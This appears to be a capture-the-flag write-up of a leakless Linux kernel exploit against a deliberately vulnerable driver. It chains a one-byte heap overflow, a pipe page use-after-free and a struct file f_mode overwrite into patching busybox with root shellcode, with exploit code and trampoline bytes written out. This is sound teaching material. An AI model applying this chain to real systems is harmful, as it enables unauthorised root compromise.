TL;DR
A single-byte NULL off-by-one in a kmalloc-1024 object is leveraged into a pipe_buffer.page LSB clear → page-level UAF → cross-cache reclaim into filp_cachep → struct file->f_mode overwrite → page-cache code injection into /bin/busybox (Dirty-Pipe style) → root code execution. Fully leakless: no kernel address is ever read.
Description: Make a contract and become a magical girl!
Target: Linux 6.17.7, x86-64. Mitigations on: SMEP, SMAP, KPTI (pti=on), KASLR, dmesg_restrict=1, kptr_restrict=1. The interactive shell runs as uid 1000.
Challenge setup
The distribution ships bzImage, vmlinux, initramfs.cpio and run.sh. QEMU boots with the usual hardening:
qemu-system-x86_64 \
-kernel bzImage -initrd initramfs.cpio \
-cpu qemu64,+smap,+smep -smp 1 -m 256M \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on" \
-no-reboot -nographic -monitor /dev/null -enable-kvm
The init script defines the threat model:
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict # no dmesg -> any %px leak is useless
chmod 600 flag.txt # /flag.txt readable by root only
insmod /driver/qb.ko
setsid cttyhack setuidgid 1000 /bin/sh # our shell is UNPRIVILEGED (uid 1000)
poweroff -d 1 -n -f # <-- runs as ROOT when our shell exits
Two facts shape the whole exploit:
- We are uid 1000; the flag is root-only, so we need root code execution.
- When our shell exits,
init(PID 1, root) runspoweroff -f. That is our eventual root trigger.
The module
qb.ko is not stripped. It registers the misc device /dev/QB with a single unlocked_ioctl handler and three globals:
char *puregem; // a single kmalloc-1024 object, zero-initialised, alloc-once, never freed
int griefseed_num; // a counter, written by CHECK, read nowhere
struct mutex LOCK;
The file_operations only wires .unlocked_ioctl = qb_ioctl. There is no open, release, read, write, mmap, and crucially no kfree and no copy_to_user anywhere in the module.
#define QB_ALLOC 0x16C0 // "sign the contract"
#define QB_CLEAR 0x16C1 // "purify the soul gem" <-- the bug lives here
#define QB_CHECK 0x16C2 // "attack the witch"
long qb_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
mutex_lock(&LOCK);
if (cmd == QB_ALLOC) { // 0x16C0
struct contract { char name[16]; char wish[48]; } req; // 0x40 bytes
if (copy_from_user(&req, arg, sizeof(req)) == 0 && !puregem) {
// kmalloc_caches[NORMAL][10] == kmalloc-1024, GFP_KERNEL|__GFP_ZERO
puregem = __kmalloc_cache_noprof(kmalloc_caches[10], 0xdc0, 0x400);
printk("[QB] Name: %.16s, Wish: %.30s\n", req.name, req.wish);
printk("[QB] puregem pointer: %px\n", puregem); // leak, but dmesg_restrict kills it
// NOTE: req is never stored into puregem, only logged.
}
}
else if (cmd == QB_CLEAR) { // 0x16C1
unsigned int size;
if (copy_from_user(&size, arg, 4) == 0 && puregem && size <= 0x400) {
memset(puregem, 0, size + 1); // size==0x400 -> writes 0x401 bytes
}
}
else if (cmd == QB_CHECK) { // 0x16C2
int v[5];
if (copy_from_user(v, arg, 0x14) == 0 && puregem) {
int sum = v[0]*0xDE + v[1]*0x67 + v[2]*0x25D + v[3]*0x398 + v[4]*0x1FD;
if (sum != 0x259B) BUG(); // gate, no heap effect
griefseed_num++;
}
}
mutex_unlock(&LOCK);
return ...;
}
| ioctl | role |
|---|---|
QB_ALLOC |
creates the single kmalloc-1024 object puregem (once). User data is not stored, only printed. The %px leak is dead (dmesg_restrict). |
QB_CLEAR |
the bug. memset(puregem, 0, size+1). |
QB_CHECK |
a gate that must be passed (it BUG()s otherwise) but has no heap effect. |
The QB_CHECK gate requires 0xDE*v0 + 0x67*v1 + 0x25D*v2 + 0x398*v3 + 0x1FD*v4 == 0x259B. Any solution works, e.g. {5, 7, 8, 1, 4} (5·222 + 7·103 + 8·605 + 1·920 + 4·509 = 9627 = 0x259B). It must be passed before the overflow so we don’t trip the BUG().
Vulnerability
QB_CLEAR validates the length with > instead of >=:
if (size > 0x400) { /* reject */ } // accepts size == 0x400
...
memset(puregem, 0, size + 1); // size==0x400 -> memset of 0x401 bytes
puregem is a kmalloc(0x400) buffer (1024 bytes, indices 0x000..0x3FF). With size == 0x400, memset writes 0x401 bytes → index 0x400 lands one byte past the buffer, writing 0.
Because puregem is allocated __GFP_ZERO and never written, the entire memset is a no-op except for that one byte hitting the first byte of the adjacent kmalloc-1024 object. This is a deterministic, replayable, single NULL-byte overflow.
Object collision in kmalloc-1024
A pipe keeps a ring of pipe_buffer descriptors (default PIPE_DEF_BUFFERS = 16), allocated as one array:
struct pipe_buffer {
struct page *page; /* +0x00 <-- our NULL byte hits its LSB */
unsigned int offset, len; /* +0x08, +0x0C */
const struct pipe_buf_operations *ops; /* +0x10 */
unsigned int flags; /* +0x18 */
unsigned long private; /* +0x20 */
}; /* 40 bytes */
16 * 40 = 640 bytes → lands in kmalloc-1024, the same cache as puregem. By grooming the slab so puregem’s neighbour is a pipe_buffer array, the NULL byte clears the LSB of pipe_buffer[0].page.
Page-pointer LSB clear (PageJack-style)
The kernel keeps a struct page descriptor for every physical page in the flat vmemmap array. Since sizeof(struct page) == 0x40, every valid struct page * is 0x40-aligned, so clearing its low byte re-aligns the pointer by 0-3 entries, so it now describes a nearby physical page, 0-3 PFNs away. With a dense pipe spray, that neighbouring page reliably belongs to another pipe.
The bytes you write() into a pipe live in page (a separate 4 KiB page), so the redirected pipe_buffer now reads/writes another pipe’s data page. No PTE is involved: the corruption is purely in the kernel pointer dereferenced for pipe I/O.
Pipe append semantics and the marker design
A pipe_buffer tracks offset (read position) and len (unread bytes). The next write() appends at page + offset + len; a read() that leaves len > 0 advances offset but does not call pipe_buf_release/put_page. This drives the whole detection-and-corruption dance.
Each pipe is tagged with 2 + 2 bytes:
uint16_t mark = MARK_BASE + i;
write(pipes[i][1], &mark, sizeof(mark)); // 2 bytes: unique marker
write(pipes[i][1], "23", 2); // 2 bytes: padding
- The 2-byte marker identifies the pipe’s data page (leakless detection below).
- The 2-byte padding keeps the buffer non-empty after detection reads 2 bytes, and positions the write cursor at offset 4 for the later
f_modeoverwrite.
The buffer ends at offset=0, len=4. The detection scan reads 2 bytes, leaving offset=2, len=2 → still offset + len == 4, page not released. The final corruption write then lands at page offset 4.
Cross-cache: filp_cachep and the buddy allocator
struct file lives in its own dedicated cache, filp_cachep. Slab caches are isolated at the slab layer but all pull backing pages from the same buddy allocator: a page freed by kmalloc-1024 (the pipe data page) can be reissued to filp_cachep on its next refill. That is how we reach a struct file without any in-module free primitive.
struct file {
spinlock_t f_lock; /* +0x00 (4 bytes) */
fmode_t f_mode; /* +0x04 <-- target */
const struct file_operations *f_op; /* +0x08 */
/* ... */
};
f_mode sits at offset 4 (confirmed with pahole -C file vmlinux, and empirically: a write at page-offset 4 flips writability). vfs_write() returns -EBADF unless f_mode & FMODE_WRITE. We overwrite f_mode with 0x084f801f (FMODE_WRITE | FMODE_PWRITE | FMODE_LSEEK | FMODE_OPENED | FMODE_CAN_*), turning a O_RDONLY busybox handle into a writable one.
Busybox recon: cave, reboot wrapper, trampoline, shellcode
busybox is No PIE (ET_EXEC, base 0x400000), so file_offset = vaddr − 0x400000.
init runs poweroff -f, which calls the reboot() syscall. We locate busybox’s reboot wrapper by its magics:
$ objdump -d -M intel busybox | grep 0xfee1dead
48bf90: f3 0f 1e fa endbr64 <-- function entry (OFF_TRAMP)
48bf94: 89 fa mov edx,edi ; cmd
48bf96: be 69 19 12 28 mov esi,0x28121969 ; MAGIC2
48bf9b: bf ad de e1 fe mov edi,0xfee1dead ; MAGIC1
48bfa0: b8 a9 00 00 00 mov eax,0xa9 ; __NR_reboot (169)
48bfa5: 0f 05 syscall
The reboot entry 0x48bf90 has 11 bytes before the next instruction, enough for a 10-byte trampoline. There is no 64-byte run of padding in this dense binary, so we sacrifice a function: scanning endbr64 entries with enough room yields 0x5df693 (0xAA bytes) as a code cave.
Trampoline (overwrites the reboot entry, jumps into the cave):
mov r8, 0x5df693
jmp r8
→ 49 c7 c0 93 f6 5d 00 41 ff e0 (10 bytes).
Shellcode, self-contained execve("/bin/sh"), built on the stack (the root poweroff process has a valid stack), 48 bytes, fits the 0xAA cave:
from pwn import *
context.arch = 'amd64'
sc = asm(shellcraft.amd64.linux.sh())
Exploitation
Step 1: sandwich puregem between pipe rings
puregem is allocated between two halves of the pipe spray, so its neighbour is reliably a pipe_buffer array rather than a slab edge:
spray_pipes(0, N_PIPE_HALF); // 0x40 pipes
qb_alloc(fd, name, wish); // puregem in the middle
spray_pipes(N_PIPE_HALF, N_PIPE); // 0x40 more
qb_check(fd); // pass the gate first
qb_clear(fd, 0x400); // FIRE: NULL byte on pipe_buffer[0].page
Step 2: leakless alias detection
Exactly one pipe’s page now points to another pipe’s page. We read each marker back; the corrupted pipe returns somebody else’s marker:
int detect_alias(int *overlap, int *origin) {
for (int i = 0; i < N_PIPE; i++) {
unsigned short val = 0;
if (read(pipes[i][0], &val, sizeof(val)) != sizeof(val)) continue;
if (val == (unsigned short)(MARK_BASE + i)) continue; // healthy
int cand = (int)val - MARK_BASE; // whose page?
if (cand >= 0 && cand < N_PIPE && cand != i) {
*overlap = i; *origin = cand;
return 1;
}
}
return 0;
}
The cand validation discards the case where the byte landed on an unrelated page. No kernel address is ever read. This is what makes the exploit leakless. Each read consumes 2 of 4 bytes, so neither page is released; overlap and origin both reference the shared page.
Step 3: free the shared page (page UAF)
close(pipes[origin][0]);
close(pipes[origin][1]); // pipe_release -> put_page; page returns to buddy
The overlap pipe still holds a stale .page pointing at the freed page: page-level use-after-free.
Step 4: cross-cache reclaim into filp
void spray_files(void) {
for (int i = 0; i < N_FILE; i++) // N_FILE = 0x50
file_fds[i] = open("/bin/busybox", O_RDONLY);
}
filp_cachep grabs fresh slab pages; one reuses the freed page and fills it with struct files. The struct file at page offset 0 has its f_mode at page offset 4.
Step 5: overwrite f_mode through the dangling pipe
void corrupt_fmode(int overlap) {
uint32_t fmode = FAKE_FMODE; // 0x084f801f
write(pipes[overlap][1], &fmode, sizeof(fmode)); // appends at page offset 4 = f_mode
}
Had we written only the 2-byte marker, reading 2 bytes would drain the buffer (len == 0), pipe_buf_release() would drop the corrupted page, and the next write would go to a fresh page. The 2-byte padding keeps the page attached and aligns this write onto f_mode.
Step 6: find the writable handle
Only the struct file at page offset 0 was corrupted. We probe each fd non-destructively (read a byte, write it back); only the corrupted one accepts the write:
int find_writable(void) {
for (int i = 0; i < N_FILE; i++) {
unsigned char b;
pread(file_fds[i], &b, 1, 0);
if (pwrite(file_fds[i], &b, 1, 0) == 1) // FMODE_WRITE set -> writable
return file_fds[i];
}
return -1;
}
Step 7: page-cache code injection (Dirty-Pipe style)
Writing through the corrupted (now writable) struct file modifies /bin/busybox’s page cache. Busybox text is mapped from that same page cache (shared, no COW for text), so the patch is seen by any process that execs busybox:
#define OFF_SHELL (0x5df693 - 0x400000) // cave -> shellcode
#define OFF_TRAMP (0x48bf90 - 0x400000) // reboot entry -> trampoline
patch_busybox(fd_corrupt, OFF_SHELL, shellcode, sizeof(shellcode) - 1);
patch_busybox(fd_corrupt, OFF_TRAMP, trampoline, sizeof(trampoline) - 1);
Step 8: trigger root
The exploit only patches and returns. We then type exit:
exit -> init (root) runs `poweroff -d 1 -n -f`
-> executes patched busybox
-> reboot() entry is now our trampoline
-> jmp 0x5df693 -> execve("/bin/sh") -> ROOT shell on the console
reboot() never runs (we jumped away), so the box doesn’t power off; we get an interactive root shell instead.
Notes & lessons
What was already familiar. PageJack (page-level UAF by clearing the LSB of pipe_buffer.page) and Dirty Pipe (writing into a file’s page cache to patch a shared executable) were techniques I already knew going in. They are the bookends of this chain, not the part I learned.
What I actually learned: corrupting struct file. The novel piece for me was the bridge between those two techniques: turning a page-level UAF into an arbitrary page-cache write by hijacking a struct file. The specific lessons:
f_modeis a privilege bit you can flip. Astruct fileopenedO_RDONLYonly lacksFMODE_WRITE; the underlying inode and page cache are otherwise fully reachable. Overwritingf_mode(offset 4) with0x084f801f(FMODE_WRITE | FMODE_PWRITE | ...) is enough to makevfs_write/pwriteaccept the handle. Nof_ophijack, no ROP: a single 4-byte write converts a read-only fd into a writable one.struct fileis a great cross-cache landing target. Sprayingopen("/bin/busybox")fillsfilp_cachepwith predictablestruct files; the one at page offset 0 putsf_modeexactly at the offset our dangling pipe writes to. The reclaim is reliable and needs no leak to confirm: I just probe each fd with a non-destructive read/write-back and watch which one becomes writable.- A writable handle on a shared binary == Dirty Pipe. Once the
O_RDONLYbusybox fd is writable,pwritelands straight in busybox’s page cache, which is shared (no COW for text) with every process that execs it. That is what let me rewrite/bin/busyboxand get root’spoweroffto run my shellcode. The corruption ofstruct fileis the thing that made the Dirty-Pipe-style finish possible here.
References
- PageJack, Black Hat USA 2024 by Qian: https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf
- Dirty Pipe (CVE-2022-0847), Max Kellermann: https://dirtypipe.cm4all.com/
- Reviving exploits against cred_struct (cross-cache groundwork), willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html